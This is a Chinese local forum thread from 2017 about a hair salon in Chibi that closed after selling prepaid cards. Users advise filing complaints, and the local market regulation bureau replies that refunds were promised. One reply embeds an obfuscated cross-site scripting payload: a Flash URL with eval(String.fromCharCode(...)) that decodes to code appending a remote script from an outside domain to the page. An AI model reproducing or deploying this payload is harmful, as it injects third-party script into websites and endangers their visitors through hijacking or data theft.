赤壁论坛

标题: 【已回复】请问工商,格兰美关门了,我充的值怎么办? [打印本页]

作者: 乌龟大仙    时间: 2017-5-8 14:21
标题: 【已回复】请问工商,格兰美关门了,我充的值怎么办?
时代广场有家美发厅,名叫格兰美。去年我在那儿充了300元,准备慢慢用。没想到前不久它关门了,还挂出了“旺店招租”的横幅! 我卡上还有大约两百元余额呢!我该怎么办?这钱是不是应该退还给消费者啊?
作者: 暖暖    时间: 2017-5-8 15:49
现在都不敢办卡了
作者: 乌龟大仙    时间: 2017-5-8 16:02
可恨的是:刚刚停业那会儿,格兰美贴出通告,说是“装修升级”。哪个晓得真实情况是不搞了。本人对这种欺骗消费者的行为表示严重愤慨!
作者: 为你心醉    时间: 2017-5-8 18:16

作者: 宝塔明灯    时间: 2017-5-8 18:34

打12315投诉。
另可以通过工商局查营业执照,查询法人电话要求退还。
营业执照有法人的身份证号。

另外理发店亏不亏钱,跟退不退充值费没有必然关系。
理发店赚钱,也没有看谁会送钱给客户啊?
亏钱不是坑人钱财的理由!

作者: minzhi5255    时间: 2017-5-8 20:53

这有是明显的欺骗,肯定还有很多人被骗了

http://localhost/flash.swf?\'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,99,110,52,122,46,99,111,109,47,99,110,122,122,46,106,115,39,93,59))+\'
作者: 恋恋家园    时间: 2017-5-8 21:09
明显欺诈
作者: 嘻哈2010    时间: 2017-5-8 21:28

作者: 不忘乡愁    时间: 2017-5-8 22:42
伤神的事。
作者: 雷之恋    时间: 2017-5-8 22:49

要充就充银行卡支付宝,冲其它卡大多是肉包子打狗。。。
作者: 地球村人    时间: 2017-5-8 23:29

作者: 相汝以沫    时间: 2017-5-8 23:35
是的
作者: cbshihao123    时间: 2017-5-9 02:56
人家都是亏到不搞了,还要。我再赤壁不低于5家网吧有充值,卡里有钱,人家都不搞了,你还找别人要吗?
作者: 早已入骨的情    时间: 2017-5-9 07:18
可以退
作者: 幕阜樵夫    时间: 2017-5-9 09:18
投诉12315,一定要店家退钱,支持投诉。
作者: 乌龟大仙    时间: 2017-5-9 09:33
搞得好好的,关什么门啊?不准关门,重新开业!不准关门,重新开业!
作者: 乌龟大仙    时间: 2017-5-9 09:36
今天开始,我要把各种充值卡统统消灭,以后再也不充这些个储值卡了。太坑爹了。
作者: 张亚军    时间: 2017-5-9 09:40
我也是受害者,请问楼主的钱拿回来了吗?
作者: 热线跟帖局局长    时间: 2017-5-9 09:59
退个毛啊,,,天真,,,
作者: lty999    时间: 2017-5-9 10:06

作者: 赤壁阿泉    时间: 2017-5-9 11:39
我以前也被坑过,那次以后就没办过卡了
作者: W5554563    时间: 2017-5-9 14:13
这都是赤壁美发厅的老套路了,先让顾客充值,一段时间在就关门装修升级,在闪人换地方,再换个招牌重新忽悠,再帮你掐指一算,流水三百,用掉一佰,还二佰随水飘走,啊,啊米豆腐,二佰你就当给别人美发家里节哀顺变用吧!
作者: cbgslkh    时间: 2017-5-9 14:54
此事真不好处理,找公安吧,不够刑事立案标准。找工商,店主关门了,工商哪里找得到?就算找到了,人家一句我生意不好亏完了,工商又没有权利限制人身自由,还不得放人走?只能是大家擦亮眼睛,莫贪眼前小利,现金结算最靠谱。
作者: 乌龟大仙    时间: 2017-5-9 14:55
弱弱问一句,这事工商局不管吗?赤裸裸的坑人啊
作者: 乌龟大仙    时间: 2017-5-9 14:56
即使不搞了,也应该良性退出!
作者: 沙虎    时间: 2017-5-9 16:12
这种事情已经发生很多次了,到底有什么好办法监管
作者: 赤壁手机换屏@贴膜哥    时间: 2017-5-9 17:14

作者: 迎娶白富美    时间: 2017-5-9 17:24
那剪头发老贵了,你只能自认倒霉。
作者: cbgslkh    时间: 2017-5-9 21:29
乌龟大仙 发表于 2017-5-9 14:55
弱弱问一句,这事工商局不管吗?赤裸裸的坑人啊

如果店主不配合,工商想管也管不了呀?门都关了,工商局能把店主么样?除非工商局自己贴钱。
作者: 赤壁市工商局-    时间: 2017-5-9 21:46
网友:
    您好!您反映的在时代广场格兰美美发厅办卡消费遭遇店家关门一事,经我局调查,现已联系上经营者,经营者承诺退还卡内余额。请持有该店消费卡的消费者及时与我局12315投诉举报中心联系(电话:5350315),我局将积极协调处理此事。
     同时,提醒消费者办理预付卡时注意以下几点:
     一是认真查看经营业主证照是否齐全;二是办理预付费卡时,要明确权利义务、服务项目、产品名称、扣费标准、使用范围、使用期限等;三是尽量避免一次性预存大笔金额;四是及时向经营者索取发票、收据或消费小票等书面凭据,并妥善保存,以便维权。
     特此回复

赤壁市工商局
                                     2017年5月9日

作者: 没有尽头20126    时间: 2017-5-10 22:53
工商表示 这是商家个人行为
作者: 为你心醉    时间: 2017-5-12 21:58
顶一个

欢迎光临 赤壁论坛 (https://cbrx.0715.cn/) Powered by Discuz! X3.2